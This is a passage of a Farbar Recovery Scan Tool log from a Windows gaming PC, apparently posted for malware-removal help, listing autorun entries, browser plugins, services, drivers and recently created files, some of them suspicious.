HKU\S-1-5-21-1557230296-4363482-4078292831-1002\...\MountPoints2: {8b2c48ea-14a9-11e4-befb-3085a9a720f7} - "W:\Autorun.exe" 
HKU\S-1-5-21-1557230296-4363482-4078292831-1002\...\MountPoints2: {8b608f49-403c-11e4-bf02-3085a9a720f7} - "W:\Install.exe" 
HKU\S-1-5-21-1557230296-4363482-4078292831-1002\...\MountPoints2: {8eecf028-4496-11e3-becd-3085a9a720f7} - "W:\Installer.exe" 
HKU\S-1-5-21-1557230296-4363482-4078292831-1002\...\MountPoints2: {9810cc21-e00f-11e2-beb0-3085a9a720f7} - "V:\AutoRunMorrowind.exe" 
HKU\S-1-5-21-1557230296-4363482-4078292831-1002\...\MountPoints2: {9810cc51-e00f-11e2-beb0-3085a9a720f7} - "W:\AutoRunBloodmoon.exe" 
HKU\S-1-5-21-1557230296-4363482-4078292831-1002\...\MountPoints2: {9810cc60-e00f-11e2-beb0-3085a9a720f7} - "X:\AutoRunTribunal.exe" 
HKU\S-1-5-21-1557230296-4363482-4078292831-1002\...\MountPoints2: {9810cce6-e00f-11e2-beb0-3085a9a720f7} - "V:\AutoRunMorrowind.exe" 
HKU\S-1-5-21-1557230296-4363482-4078292831-1002\...\MountPoints2: {9810cf09-e00f-11e2-beb0-3085a9a720f7} - "V:\AutoRunMorrowind.exe" 
HKU\S-1-5-21-1557230296-4363482-4078292831-1002\...\MountPoints2: {9810cf54-e00f-11e2-beb0-3085a9a720f7} - "W:\AutoRunBloodmoon.exe" 
HKU\S-1-5-21-1557230296-4363482-4078292831-1002\...\MountPoints2: {9810cf67-e00f-11e2-beb0-3085a9a720f7} - "X:\AutoRunTribunal.exe" 
HKU\S-1-5-21-1557230296-4363482-4078292831-1002\...\MountPoints2: {9810cf84-e00f-11e2-beb0-3085a9a720f7} - "V:\AutoRunMorrowind.exe" 
HKU\S-1-5-21-1557230296-4363482-4078292831-1002\...\MountPoints2: {9810cfbe-e00f-11e2-beb0-3085a9a720f7} - "X:\AutoRunTribunal.exe" 
HKU\S-1-5-21-1557230296-4363482-4078292831-1002\...\MountPoints2: {983b7abb-fe41-11e2-bebd-20aa4b7ab8bf} - "V:\Install.exe" 
HKU\S-1-5-21-1557230296-4363482-4078292831-1002\...\MountPoints2: {9b30cb6a-dbb5-11e3-beec-3085a9a720f7} - "W:\autorun.exe" 
HKU\S-1-5-21-1557230296-4363482-4078292831-1002\...\MountPoints2: {9b30cc47-dbb5-11e3-beec-3085a9a720f7} - "W:\autorun.exe" 
HKU\S-1-5-21-1557230296-4363482-4078292831-1002\...\MountPoints2: {9b30d536-dbb5-11e3-beec-3085a9a720f7} - "W:\setup.exe" 
HKU\S-1-5-21-1557230296-4363482-4078292831-1002\...\MountPoints2: {9b30d7dc-dbb5-11e3-beec-3085a9a720f7} - "W:\autorun.exe" 
HKU\S-1-5-21-1557230296-4363482-4078292831-1002\...\MountPoints2: {b357db0c-3a8d-11e3-becc-3085a9a720f7} - "W:\MB-Warband-Napoleonic-Wars.exe" 
HKU\S-1-5-21-1557230296-4363482-4078292831-1002\...\MountPoints2: {b357e30d-3a8d-11e3-becc-3085a9a720f7} - "W:\MB-Warband-Napoleonic-Wars.exe" 
HKU\S-1-5-21-1557230296-4363482-4078292831-1002\...\MountPoints2: {c37b970e-c401-11e3-bee7-3085a9a720f7} - "W:\setup.exe" 
HKU\S-1-5-21-1557230296-4363482-4078292831-1002\...\MountPoints2: {c37b985e-c401-11e3-bee7-3085a9a720f7} - "W:\setup.exe" 
HKU\S-1-5-21-1557230296-4363482-4078292831-1002\...\MountPoints2: {c37b98a3-c401-11e3-bee7-3085a9a720f7} - "W:\setup.exe" 
HKU\S-1-5-21-1557230296-4363482-4078292831-1002\...\MountPoints2: {c37b98ae-c401-11e3-bee7-3085a9a720f7} - "W:\setup.exe" 
HKU\S-1-5-21-1557230296-4363482-4078292831-1002\...\MountPoints2: {cfd62f9e-d92d-11e3-beec-3085a9a720f7} - "W:\Setup.exe" 
HKU\S-1-5-21-1557230296-4363482-4078292831-1002\...\MountPoints2: {dd3c40e4-f792-11e3-bef3-3085a9a720f7} - "W:\setup.exe" 
HKU\S-1-5-21-1557230296-4363482-4078292831-1002\...\MountPoints2: {dd3c41c9-f792-11e3-bef3-3085a9a720f7} - "W:\Setup.exe" 
HKU\S-1-5-21-1557230296-4363482-4078292831-1002\...\MountPoints2: {e71be4cb-cac0-11e3-bee9-3085a9a720f7} - "W:\Autorun.exe" 
HKU\S-1-5-21-1557230296-4363482-4078292831-1002\...\MountPoints2: {ea73b1b6-0701-11e2-be6b-806e6f6e6963} - "E:\install.exe" 
HKU\S-1-5-21-1557230296-4363482-4078292831-1002\...A8F59079A8D5}\localserver32:  <==== ATTENTION!
AppInit_DLLs-x32: DllInjectHelper.dll => "DllInjectHelper.dll" File Not Found
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\RealPlayer Cloud Service UI.lnk
ShortcutTarget: RealPlayer Cloud Service UI.lnk -> C:\Program Files (x86)\Real\RealPlayer\RPDS\Bin64\rpsystray.exe (RealNetworks, Inc.)
ShellIconOverlayIdentifiers: [ SkyDrive1] -> {F241C880-6982-4CE5-8CF7-7085BA96DA5A} =>  No File
ShellIconOverlayIdentifiers: [ SkyDrive2] -> {A0396A93-DC06-4AEF-BEE9-95FFCCAEF20E} =>  No File
ShellIconOverlayIdentifiers: [ SkyDrive3] -> {BBACC218-34EA-4666-9D7A-C78F2274A524} =>  No File
ShellIconOverlayIdentifiers: [AsusWSShellExt_B] -> {6D4133E5-0742-4ADC-8A8C-9303440F7190} => C:\Program Files (x86)\ASUS\WebStorage Sync Agent\1.1.3.105\ASUSWSShellExt64.dll (ASUS Cloud Corporation.)
ShellIconOverlayIdentifiers: [AsusWSShellExt_O] -> {64174815-8D98-4CE6-8646-4C039977D808} => C:\Program Files (x86)\ASUS\WebStorage Sync Agent\1.1.3.105\ASUSWSShellExt64.dll (ASUS Cloud Corporation.)
ShellIconOverlayIdentifiers: [AsusWSShellExt_U] -> {1C5AB7B1-0B38-4EC4-9093-7FD277E2AF4D} => C:\Program Files (x86)\ASUS\WebStorage Sync Agent\1.1.3.105\ASUSWSShellExt64.dll (ASUS Cloud Corporation.)
ShellIconOverlayIdentifiers-x32: [ SkyDrive1] -> {F241C880-6982-4CE5-8CF7-7085BA96DA5A} =>  No File
ShellIconOverlayIdentifiers-x32: [ SkyDrive2] -> {A0396A93-DC06-4AEF-BEE9-95FFCCAEF20E} =>  No File
ShellIconOverlayIdentifiers-x32: [ SkyDrive3] -> {BBACC218-34EA-4666-9D7A-C78F2274A524} =>  No File
 
==================== Internet (Whitelisted) ====================
 
(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)
 
HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = www.google.com
HKCU\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://asus13.msn.com
SearchScopes: HKLM - DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = http://www.bing.com/search?q={searchTerms}&form=IE10TR&src=IE10TR&pc=ASU2JS
SearchScopes: HKLM - {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = http://www.bing.com/search?q={searchTerms}&form=IE10TR&src=IE10TR&pc=ASU2JS
SearchScopes: HKLM-x32 - DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = http://www.bing.com/search?q={searchTerms}&form=IE10TR&src=IE10TR&pc=ASU2JS
SearchScopes: HKLM-x32 - {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = http://www.bing.com/search?q={searchTerms}&form=IE10TR&src=IE10TR&pc=ASU2JS
SearchScopes: HKCU - DefaultScope {DE735EC1-AA5B-4ED2-A1F0-B6C85F4E8ABE} URL = http://search.yahoo.com/search?fr=chr-greentree_ie&ei=utf-8&ilc=12&type=714647&p={searchTerms}
SearchScopes: HKCU - {DE735EC1-AA5B-4ED2-A1F0-B6C85F4E8ABE} URL = http://search.yahoo.com/search?fr=chr-greentree_ie&ei=utf-8&ilc=12&type=714647&p={searchTerms}
BHO: Bing Bar Helper -> {1dad3af3-ef2f-4f64-ac4b-11789189fcb6} -> C:\Program Files (x86)\Microsoft\BingBar\7.3.132.0\amd64\BingExt.dll (Microsoft Corporation.)
BHO: RealNetworks Download and Record Plugin for Internet Explorer -> {3049C3E9-B461-4BC5-8870-4C09146192CA} -> C:\Program Files (x86)\RealNetworks\RealDownloader\BrowserPlugins\IE\rndlbrowserrecordplugin64.dll (RealDownloader)
BHO: Skype Click to Call for Internet Explorer -> {AE805869-2E5C-4ED4-8F7B-F1F7851A4497} -> C:\Program Files (x86)\Skype\Toolbars\Internet Explorer x64\skypeieplugin.dll (Microsoft Corporation)
BHO: Logitech SetPoint -> {AF949550-9094-4807-95EC-D1C317803333} -> C:\Program Files\Logitech\SetPointP\SetPointSmooth.dll (Logitech, Inc.)
BHO-x32: Adobe PDF Link Helper -> {18DF081C-E8AD-4283-A596-FA578C2EBDC3} -> C:\Program Files (x86)\Common Files\Adobe\Acrobat\ActiveX\AcroIEHelperShim.dll (Adobe Systems Incorporated)
BHO-x32: Bing Bar Helper -> {1dad3af3-ef2f-4f64-ac4b-11789189fcb6} -> C:\Program Files (x86)\Microsoft\BingBar\7.3.132.0\BingExt.dll (Microsoft Corporation.)
BHO-x32: RealNetworks Download and Record Plugin for Internet Explorer -> {3049C3E9-B461-4BC5-8870-4C09146192CA} -> C:\Program Files (x86)\RealNetworks\RealDownloader\BrowserPlugins\IE\rndlbrowserrecordplugin.dll (RealDownloader)
BHO-x32: Java™ Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files (x86)\Java\jre7\bin\ssv.dll (Oracle Corporation)
BHO-x32: Skype Click to Call for Internet Explorer -> {AE805869-2E5C-4ED4-8F7B-F1F7851A4497} -> C:\Program Files (x86)\Skype\Toolbars\Internet Explorer\SkypeIEPlugin.dll (Microsoft Corporation)
BHO-x32: Logitech SetPoint -> {AF949550-9094-4807-95EC-D1C317803333} -> C:\Program Files\Logitech\SetPointP\32-bit\SetPointSmooth.dll (Logitech, Inc.)
BHO-x32: Java™ Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files (x86)\Java\jre7\bin\jp2ssv.dll (Oracle Corporation)
Toolbar: HKLM - Bing Bar - {eec0f710-38b5-4aba-99bf-ec87564a4e13} - C:\Program Files (x86)\Microsoft\BingBar\7.3.132.0\amd64\BingExt.dll (Microsoft Corporation.)
Toolbar: HKLM-x32 - Bing Bar - {eec0f710-38b5-4aba-99bf-ec87564a4e13} - C:\Program Files (x86)\Microsoft\BingBar\7.3.132.0\BingExt.dll (Microsoft Corporation.)
Handler: skypec2c - {91774881-D725-4E58-B298-07617B9B86A8} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer x64\skypeieplugin.dll (Microsoft Corporation)
Handler-x32: skype4com - {FFC8B962-9B40-4DFF-9458-1830C7DD7F5D} - C:\Program Files (x86)\Common Files\Skype\Skype4COM.dll (Skype Technologies)
Handler-x32: skypec2c - {91774881-D725-4E58-B298-07617B9B86A8} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer\SkypeIEPlugin.dll (Microsoft Corporation)
Hosts: Hosts file not detected in the default directory
Tcpip\Parameters: [DhcpNameServer] 192.168.0.1
 
FireFox:
========
FF ProfilePath: C:\Users\RaRWolf\AppData\Roaming\Mozilla\Firefox\Profiles\g0sikcyb.default-1384639035960
FF Plugin: @adobe.com/FlashPlayer -> C:\Windows\system32\Macromed\Flash\NPSWF64_15_0_0_152.dll ()
FF Plugin: @esn/npbattlelog,version=2.5.1 -> C:\Program Files (x86)\Battlelog Web Plugins\2.5.1\npbattlelogx64.dll (EA Digital Illusions CE AB)
FF Plugin: @wacom.com/wtPlugin,version=2.1.0.7 -> C:\Program Files\TabletPlugins\npWacomTabletPlugin.dll (Wacom)
FF Plugin: wacom.com/WacomTabletPlugin -> C:\Program Files\TabletPlugins\npWacomTabletPlugin.dll (Wacom)
FF Plugin-x32: @adobe.com/FlashPlayer -> C:\Windows\SysWOW64\Macromed\Flash\NPSWF32_15_0_0_152.dll ()
FF Plugin-x32: @adobe.com/ShockwavePlayer -> C:\Windows\SysWOW64\Adobe\Director\np32dsw_1204144.dll (Adobe Systems, Inc.)
FF Plugin-x32: @Apple.com/iTunes,version=1.0 -> C:\Program Files (x86)\iTunes\Mozilla Plugins\npitunes.dll ()
FF Plugin-x32: @esn.me/esnsonar,version=0.70.4 -> C:\Program Files (x86)\Battlelog Web Plugins\Sonar\0.70.4\npesnsonar.dll No File
FF Plugin-x32: @esn/npbattlelog,version=2.3.1 -> C:\Program Files (x86)\Battlelog Web Plugins\2.3.1\npbattlelog.dll No File
FF Plugin-x32: @esn/npbattlelog,version=2.4.0 -> C:\Program Files (x86)\Battlelog Web Plugins\2.4.0\npbattlelog.dll (EA Digital Illusions CE AB)
FF Plugin-x32: @esn/npbattlelog,version=2.5.1 -> C:\Program Files (x86)\Battlelog Web Plugins\2.5.1\npbattlelog.dll (EA Digital Illusions CE AB)
FF Plugin-x32: @idsoftware.com/QuakeLive -> C:\ProgramData\id Software\QuakeLive\npquakezero.dll (id Software Inc.)
FF Plugin-x32: @java.com/DTPlugin,version=10.67.2 -> C:\Program Files (x86)\Java\jre7\bin\dtplugin\npDeployJava1.dll (Oracle Corporation)
FF Plugin-x32: @java.com/JavaPlugin,version=10.67.2 -> C:\Program Files (x86)\Java\jre7\bin\plugin2\npjp2.dll (Oracle Corporation)
FF Plugin-x32: @live.heroesandgenerals.com/npretox -> C:\Program Files (x86)\Heroes & Generals\live\npretoxlive.dll No File
FF Plugin-x32: @microsoft.com/WLPG,version=16.4.3503.0728 -> C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll (Microsoft Corporation)
FF Plugin-x32: @nvidia.com/3DVision -> C:\Program Files (x86)\NVIDIA Corporation\3D Vision\npnv3dv.dll (NVIDIA Corporation)
FF Plugin-x32: @nvidia.com/3DVisionStreaming -> C:\Program Files (x86)\NVIDIA Corporation\3D Vision\npnv3dvstreaming.dll (NVIDIA Corporation)
FF Plugin-x32: @real.com/nppl3260;version=17.0.12.0 -> C:\Program Files (x86)\Real\RealPlayer\Netscape6\nppl3260.dll (RealNetworks, Inc.)
FF Plugin-x32: @real.com/nprndlhtml5videoshim;version=17.0.12 -> C:\ProgramData\RealNetworks\RealDownloader\BrowserPlugins\MozillaPlugins\nprndlhtml5videoshim.dll (RealNetworks, Inc.)
FF Plugin-x32: @real.com/nprpplugin;version=17.0.12.0 -> C:\Program Files (x86)\Real\RealPlayer\Netscape6\nprpplugin.dll (RealPlayer Cloud)
FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.25.5\npGoogleUpdate3.dll (Google Inc.)
FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.25.5\npGoogleUpdate3.dll (Google Inc.)
FF Plugin-x32: @TrendMicro.com/FFExtension -> C:\Program Files\Trend Micro\Titanium\UIFramework\Toolbar\firefoxextension\components\npToolbarChrome.dll No File
FF Plugin-x32: @videolan.org/vlc,version=2.1.5 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll (VideoLAN)
FF Plugin-x32: @wacom.com/wtPlugin,version=2.1.0.7 -> C:\Program Files (x86)\TabletPlugins\npWacomTabletPlugin.dll (Wacom)
FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Reader 10.0\Reader\AIR\nppdf32.dll (Adobe Systems Inc.)
FF Plugin-x32: wacom.com/WacomTabletPlugin -> C:\Program Files (x86)\TabletPlugins\npWacomTabletPlugin.dll (Wacom)
FF Plugin HKCU: @coreonline.com/run3d,version=1.0 -> C:\Users\RaRWolf\AppData\LocalLow\Square Enix\nprun3d.dll (Square Enix)
FF Plugin HKCU: @nsroblox.roblox.com/launcher -> C:\Users\RaRWolf\AppData\Local\Roblox\Versions\version-58bb25d673384171\\NPRobloxProxy.dll ( Roblox Corporation)
FF Plugin HKCU: @unity3d.com/UnityPlayer,version=1.0 -> C:\Users\RaRWolf\AppData\LocalLow\Unity\WebPlayer\loader\npUnity3D32.dll (Unity Technologies ApS)
FF Plugin HKCU: ubisoft.com/uplaypc -> C:\Games\Trials\datapack\orbit\npuplaypc.dll No File
FF Extension: MtStream Class - C:\Users\RaRWolf\AppData\Roaming\Mozilla\Firefox\Profiles\g0sikcyb.default-1384639035960\Extensions\{CF0219E1-AA46-BD3E-528B-4CC8133100D7} [2014-10-22]
FF Extension: YouTube Center - C:\Users\RaRWolf\AppData\Roaming\Mozilla\Firefox\Profiles\g0sikcyb.default-1384639035960\Extensions\jid1-cwbvBTE216jjpg@jetpack.xpi [2013-12-23]
FF Extension: No Name - C:\Program Files (x86)\Mozilla Firefox\browser\extensions\{82AF8DCA-6DE9-405D-BD5E-43525BDAD38A}.xpi [2014-07-14]
FF HKLM-x32\...\Firefox\Extensions: [{F003DA68-8256-4b37-A6C4-350FA04494DF}] - C:\Program Files\Logitech\SetPointP\LogiSmoothFirefoxExt
FF Extension: Logitech SetPoint - C:\Program Files\Logitech\SetPointP\LogiSmoothFirefoxExt [2014-07-15]
FF HKLM-x32\...\Firefox\Extensions: [{7C9C2591-51ED-44FA-8D03-450B92643F95}] - C:\ProgramData\RealNetworks\RealDownloader\BrowserPlugins\Firefox\Ext
FF Extension: RealDownloader - C:\ProgramData\RealNetworks\RealDownloader\BrowserPlugins\Firefox\Ext [2014-08-01]
 
Chrome: 
=======
CHR HomePage: Default -> hxxp://www.microsoft.com/isapi/redir.dll?prd=ie&pver=6&ar=msnhome
CHR Profile: C:\Users\RaRWolf\AppData\Local\Google\Chrome\User Data\Default
CHR Extension: (Google Docs) - C:\Users\RaRWolf\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2014-03-20]
CHR Extension: (Google Drive) - C:\Users\RaRWolf\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2014-03-20]
CHR Extension: (Google Voice Search Hotword (Beta)) - C:\Users\RaRWolf\AppData\Local\Google\Chrome\User Data\Default\Extensions\bepbmhgboaologfdajaanbcjmnhjmhfn [2014-05-24]
CHR Extension: (YouTube) - C:\Users\RaRWolf\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2014-03-20]
CHR Extension: (Google Search) - C:\Users\RaRWolf\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf [2014-03-20]
CHR Extension: (YouTube Center) - C:\Users\RaRWolf\AppData\Local\Google\Chrome\User Data\Default\Extensions\nahndmkihaedfgkhbpopcpnbdeckeibo [2014-03-20]
CHR Extension: (Google Wallet) - C:\Users\RaRWolf\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2014-03-20]
CHR Extension: (Gmail) - C:\Users\RaRWolf\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2014-03-20]
 
==================== Services (Whitelisted) =================
 
(If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)
 
R2 asComSvc; C:\Program Files (x86)\ASUS\AXSP\1.00.19\atkexComSvc.exe [920736 2012-06-01] ()
R2 asHmComSvc; C:\Program Files (x86)\ASUS\AAHM\1.00.20\aaHMSvc.exe [951936 2012-06-01] (ASUSTeK Computer Inc.)
R2 AsSysCtrlService; C:\Program Files (x86)\ASUS\AsSysCtrlService\1.00.13\AsSysCtrlService.exe [149120 2012-02-17] (ASUSTeK Computer Inc.)
S3 BEService; C:\Program Files (x86)\Common Files\BattlEye\BEService.exe [49152 2013-02-03] () [File not signed]
R2 c2cautoupdatesvc; C:\Program Files (x86)\Skype\Toolbars\AutoUpdate\SkypeC2CAutoUpdateSvc.exe [1390176 2014-07-14] (Microsoft Corporation)
R2 c2cpnrsvc; C:\Program Files (x86)\Skype\Toolbars\PNRSvc\SkypeC2CPNRSvc.exe [1767520 2014-07-14] (Microsoft Corporation)
R2 HiPatchService; C:\Program Files (x86)\Hi-Rez Studios\HiPatchService.exe [9216 2014-02-28] (Hi-Rez Studios) [File not signed]
S3 IDriverT; C:\Program Files (x86)\Common Files\InstallShield\Driver\1150\Intel 32\IDriverT.exe [69632 2005-11-14] (Macrovision Corporation) [File not signed]
R3 KeyIso; C:\Windows\SysWOW64\keyiso.dll [43520 2012-07-25] (Microsoft Corporation)
R2 LMIGuardianSvc; C:\Program Files (x86)\LogMeIn Hamachi\LMIGuardianSvc.exe [377616 2014-08-08] (LogMeIn, Inc.)
S2 MBAMScheduler; C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamscheduler.exe [1809720 2014-05-12] (Malwarebytes Corporation)
S2 MBAMService; C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamservice.exe [860472 2014-05-12] (Malwarebytes Corporation)
S3 Netlogon; C:\Windows\SysWOW64\netlogon.dll [634368 2012-07-25] (Microsoft Corporation)
R2 NvNetworkService; C:\Program Files (x86)\NVIDIA Corporation\NetService\NvNetworkService.exe [1720608 2014-07-25] (NVIDIA Corporation)
R2 NvStreamSvc; C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamsvc.exe [18956064 2014-07-25] (NVIDIA Corporation)
R2 PnkBstrA; C:\Windows\SysWOW64\PnkBstrA.exe [76152 2014-06-30] ()
S2 PSI_SVC_2_x64; c:\Program Files\Common Files\Protexis\License Service\PsiService_2.exe [336824 2010-11-30] (arvato digital services llc)
S2 RealNetworks Downloader Resolver Service; C:\Program Files (x86)\RealNetworks\RealDownloader\rndlresolversvc.exe [39568 2014-07-24] ()
S2 RealPlayer Cloud Service; C:\Program Files (x86)\Real\RealPlayer\RPDS\Bin\rpdsvc.exe [1141848 2014-08-01] (RealNetworks, Inc.)
S2 RealPlayerUpdateSvc; C:\Program Files (x86)\Real\UpdateService\RealPlayerUpdateSvc.exe [23552 2014-07-24] () [File not signed]
S2 RzKLService; C:\Program Files (x86)\Razer\Razer Game Booster\RzKLService.exe [106472 2013-09-18] (Razer Inc.)
S2 RzMaelstromVADStreamingService; C:\ProgramData\Razer\Synapse\Devices\Razer Surround\Driver\RzMaelstromVADStreamingService.exe [4250624 2014-06-09] (A-Volute) [File not signed]
S3 StorSvc; C:\Windows\SysWOW64\storsvc.dll [18432 2012-07-25] (Microsoft Corporation)
R2 TabletServiceWacom; C:\Windows\system32\Wacom_Tablet.exe [3647272 2009-03-26] (Wacom Technology, Corp.)
R2 WinDefend; C:\Program Files\Windows Defender\MsMpEng.exe [14920 2013-01-28] (Microsoft Corporation)
R2 WTabletServicePro; C:\Program Files\Tablet\Wacom\WTabletServicePro.exe [635160 2014-04-21] (Wacom Technology, Corp.)
 
==================== Drivers (Whitelisted) ====================
 
(If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)
 
R3 AiCharger; C:\Windows\SysWow64\drivers\AiCharger.sys [14848 2012-03-22] (ASUSTek Computer Inc.)
R1 AsIO; C:\Windows\SysWow64\drivers\AsIO.sys [13440 2010-08-24] ()
R1 AsUpIO; C:\Windows\SysWow64\drivers\AsUpIO.sys [14464 2010-08-03] ()
S3 AtiHDAudioService; C:\Windows\system32\drivers\AtihdW86.sys [98744 2013-04-23] (Advanced Micro Devices)
S2 atksgt; C:\Windows\System32\DRIVERS\atksgt.sys [312480 2014-04-24] ()
R3 dtsoftbus01; C:\Windows\System32\drivers\dtsoftbus01.sys [283200 2013-05-26] (DT Soft Ltd)
S1 fsthvckq; C:\Windows\system32\drivers\fsthvckq.sys [55104 2014-10-19] (Microsoft Corporation)
R3 hamachi; C:\Windows\system32\DRIVERS\Hamdrv.sys [46136 2014-09-04] (LogMeIn Inc.)
R3 LcUvcUpper; C:\Windows\system32\DRIVERS\LcUvcUpper.sys [34408 2013-10-14] (Microsoft Corporation)
R3 Linksys_adapter_H; C:\Windows\system32\DRIVERS\AE2500w764.sys [1254464 2011-03-28] (Broadcom Corporation)
R2 lirsgt; C:\Windows\System32\DRIVERS\lirsgt.sys [43168 2014-04-24] ()
R3 MBAMProtector; C:\Windows\system32\drivers\mbam.sys [25816 2014-05-12] (Malwarebytes Corporation)
S3 MBAMWebAccessControl; C:\Windows\system32\drivers\mwac.sys [64216 2014-05-12] (Malwarebytes Corporation)
R3 NvStreamKms; C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamKms.sys [20256 2014-07-25] (NVIDIA Corporation)
R3 nvvad_WaveExtensible; C:\Windows\system32\drivers\nvvad64v.sys [40392 2014-03-31] (NVIDIA Corporation)
S3 RTCore64; C:\Program Files (x86)\MSI Afterburner\RTCore64.sys [13368 2013-01-23] ()
R3 RZMAELSTROMVADService; C:\Windows\system32\drivers\RzMaelstromVAD.sys [32768 2014-06-09] (Windows ® Win 7 DDK provider)
R2 rzpmgrk; C:\Windows\system32\drivers\rzpmgrk.sys [37184 2014-07-15] (Razer, Inc.)
R2 rzpnk; C:\Windows\system32\drivers\rzpnk.sys [129856 2014-07-03] (Razer, Inc.)
U3 TrueSight; C:\Windows\System32\Drivers\TrueSight.sys [37624 2014-10-23] ()
S3 xusb22; C:\Windows\System32\drivers\xusb22.sys [89088 2012-07-25] (Microsoft Corporation)
S2 AODDriver4.2.0; \??\C:\Program Files\ATI Technologies\ATI.ACE\Fuel\amd64\AODDriver2.sys [X]
S1 ririguvw; \??\C:\Windows\system32\drivers\ririguvw.sys [X]
S3 wacommousefilter; \SystemRoot\System32\drivers\wacommousefilter.sys [X]
S3 wacomvhid; \SystemRoot\System32\drivers\wacomvhid.sys [X]
S3 xhunter1; \??\C:\Windows\xhunter1.sys [X]
 
==================== NetSvcs (Whitelisted) ===================
 
(If an item is included in the fixlist, it will be removed from the registry. Any associated file could be listed separately to be moved.)
 
 
==================== One Month Created Files and Folders ========
 
(If an entry is included in the fixlist, the file\folder will be moved.)
 
2014-10-23 17:06 - 2014-10-23 17:06 - 00037624 _____ () C:\Windows\system32\Drivers\TrueSight.sys
2014-10-23 17:06 - 2014-10-23 17:06 - 00000000 ____D () C:\ProgramData\RogueKiller
2014-10-23 17:04 - 2014-10-23 17:06 - 19114072 _____ () C:\Users\RaRWolf\Downloads\RogueKillerX64.exe
2014-10-22 19:46 - 2014-10-23 18:00 - 00000848 _____ () C:\Windows\Tasks\Security Center Update - 3510430382.job
2014-10-22 19:46 - 2014-10-23 18:00 - 00000836 _____ () C:\Windows\Tasks\Security Center Update - 1195299623.job
2014-10-22 19:46 - 2014-10-22 19:46 - 00003824 _____ () C:\Windows\System32\Tasks\Security Center Update - 3510430382
2014-10-22 19:46 - 2014-10-22 19:46 - 00003812 _____ () C:\Windows\System32\Tasks\Security Center Update - 1195299623
2014-10-22 19:46 - 2014-10-22 19:46 - 00000000 ____D () C:\Users\RaRWolf\AppData\Roaming\Myrycaop
2014-10-22 19:46 - 2014-10-22 19:46 - 00000000 ____D () C:\Users\RaRWolf\AppData\Roaming\Liigli
2014-10-22 19:41 - 2014-10-22 19:42 - 00000000 ____D () C:\Users\RaRWolf\AppData\Local\Ecvtion
2014-10-22 19:40 - 2014-10-22 19:40 - 00000000 ____D () C:\Users\RaRWolf\AppData\Local\Alldworks
2014-10-22 17:50 - 2014-10-22 17:50 - 00001105 _____ () C:\Users\Public\Desktop\RPG MAKER VX Ace.lnk
2014-10-22 17:49 - 2014-10-22 17:49 - 00000000 ____D () C:\Program Files (x86)\Enterbrain
2014-10-22 17:16 - 2014-10-22 17:19 - 00057166 _____ () C:\Users\RaRWolf\Downloads\Addition.txt
2014-10-22 17:11 - 2014-10-23 18:31 - 00038019 _____ () C:\Users\RaRWolf\Downloads\FRST.txt
2014-10-22 17:11 - 2014-10-22 17:11 - 00000000 ____D () C:\Users\RaRWolf\Downloads\FRST-OlderVersion
2014-10-21 18:40 - 2014-10-21 18:40 - 00032720 _____ () C:\Users\RaRWolf\Desktop\attach.txt
2014-10-21 18:40 - 2014-10-21 18:39 - 00021892 _____ () C:\Users\RaRWolf\Desktop\dds.txt
2014-10-21 18:35 - 2014-10-21 18:35 - 00688992 ____R (Swearware) C:\Users\RaRWolf\Downloads\dds.com
2014-10-21 18:29 - 2014-10-21 18:29 - 00000000 ____D () C:\Users\RaRWolf\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Running With Rifles 0.98.4
2014-10-19 21:20 - 2014-10-19 21:20 - 00055104 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\fsthvckq.sys
2014-10-19 21:17 - 2014-10-19 21:21 - 00005062 _____ () C:\Windows\SysWOW64\rsslogs.20141019211656
2014-10-19 21:11 - 2014-10-19 21:14 - 00003797 _____ () C:\Windows\SysWOW64\rsslogs.20141019211029
2014-10-19 11:45 - 2014-10-19 11:46 - 00000000 ____D () C:\Users\RaRWolf\AppData\Local\PAYDAY
2014-10-19 11:40 - 2014-10-19 11:41 - 00002535 _____ () C:\Windows\SysWOW64\rsslogs.20141019113949
2014-10-18 23:58 - 2014-10-19 10:42 - 00029055 _____ () C:\Windows\SysWOW64\rsslogs.20141018235802
2014-10-18 19:10 - 2014-10-19 11:39 - 00000000 ____D () C:\Users\RaRWolf\AppData\Roaming\Ifylqyte
2014-10-18 19:07 - 2014-10-23 16:52 - 00003246 _____ () C:\Windows\System32\Tasks\RealDownloaderRealUpgradeLogonTaskS-1-5-21-1557230296-4363482-4078292831-1002
